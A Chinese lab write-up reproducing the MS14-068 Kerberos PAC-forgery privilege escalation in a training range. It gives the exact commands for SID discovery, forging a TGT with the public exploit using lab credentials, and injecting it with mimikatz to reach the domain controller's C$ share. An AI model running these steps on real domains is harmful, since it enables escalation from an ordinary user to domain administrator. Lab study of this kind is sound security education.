在kerberos协议中,Client去访问Server,需要知道是否具有访问权限。所以微软在KRB_AS_REP中的TGT中增加了Client的PAC(特权属性证书),也就是Client的权限,包括Client的User的SID、Group的SID。ms14-068 漏洞就是 经过身份验证的Client在TGT中伪造高权限的PAC。该漏洞允许任何一个域普通用户,将自己提升至域管理员权限。
该漏洞复现环境是红日二靶场搭建的,拓扑如下
主机名字 | IP |
---|---|
DC.de1ay.com | 10.10.10.10(内网) |
PC.de1ay.com | 10.10.10.20(内网)/192.168.111.201(外网) |
该漏洞需要使用到以下信息:
信息收集
查看域名
ipconfig /all
查看域用户SID
whoami /all
查看域控ip
net time /domain #查看域控名字
ping DC.de1ay.com #ping域控就能得到域控ip地址
首先查看有无ipc连接,发现没有ipc连接
dir \\10.10.10.10\c$
在内网机器中运行运行以下命令生成TGT票据,需要MS14-068的EXP,在github上就能很容易找到。
MS14-068.exe -u mssql@de1ay.com -s S-1-5-21-2756371121-2868759905-3853650604-2103 -d 10.10.10.10 -p 1qaz@WSX
将生成的TGT票据移动到mimikatz中进行票据的导入,进行票据攻击
mimikatz.exe
kerberos::purge
kerberos::ptc TGT_mssql@de1ay.com.ccache
既然票据传递攻击成功了,那么我们就可以对域控的c盘映射到本地中,进行任意的查看,我这里为了方便就直接查看c盘。
这里我用mssql权限的时候,一直攻击失败,不知道是什么原因
dir \\10.10.10.10\c$
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。